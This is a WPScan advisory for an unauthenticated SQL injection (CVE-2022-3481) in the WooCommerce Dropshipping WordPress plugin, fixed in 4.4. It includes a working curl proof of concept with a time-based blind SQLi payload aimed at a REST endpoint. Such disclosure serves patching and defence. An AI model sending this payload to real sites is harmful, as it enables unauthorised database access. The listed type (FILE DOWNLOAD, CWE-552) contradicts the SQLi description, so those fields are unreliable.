WordPress Plugin Vulnerabilities

WooCommerce Dropshipping < 4.4 - Unauthenticated SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via a REST endpoint available to unauthenticated users, leading to a SQL injection

Proof of Concept

curl -isk -X 'POST' -H "Content-Type: application/json" --data '{"sku":"a\" AND (SELECT 42 FROM (SELECT(SLEEP(5)))wlHd)-- pOeU"}' 'https://example.com/wp-json/woo-aliexpress/v1/product-sku'

Affects Plugins

Plugin icon
woocommerce-dropshipping
Fixed in 4.4

References

CVE
CVE-2022-3481

Classification

Type
FILE DOWNLOAD
OWASP top 10
A1: Injection
CWE
CWE-552
CVSS
8.6 (high)

Miscellaneous

Original Researcher
WPScan
Verified
Yes
WPVDB ID
c5e395f8-257e-49eb-afbd-9c1e26045373

Timeline

Publicly Published
2022-10-17 (about 1 years ago)
Added
2022-10-17 (about 1 years ago)
Last Updated
2022-10-17 (about 1 years ago)

Other

Published
Title
Published
2022-01-06
Title
RVM - Responsive Vector Maps < 6.4.2 - Subscriber+ Arbitrary File Read
Published
2022-08-17
Title
All-in-One Video Gallery 2.5.8 - 2.6.0 - Unauthenticated Arbitrary File Download & SSRF
Published
2023-04-19
Title
KIWIZ Invoices Certification & PDF System <= 2.1.3 - Unauthenticated Arbitrary File Download
Published
2022-11-28
Title
Wholesale Market for WooCommerce < 1.0.7 - Unauthenticated Arbitrary File Download
Published
2021-08-31
Title
DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download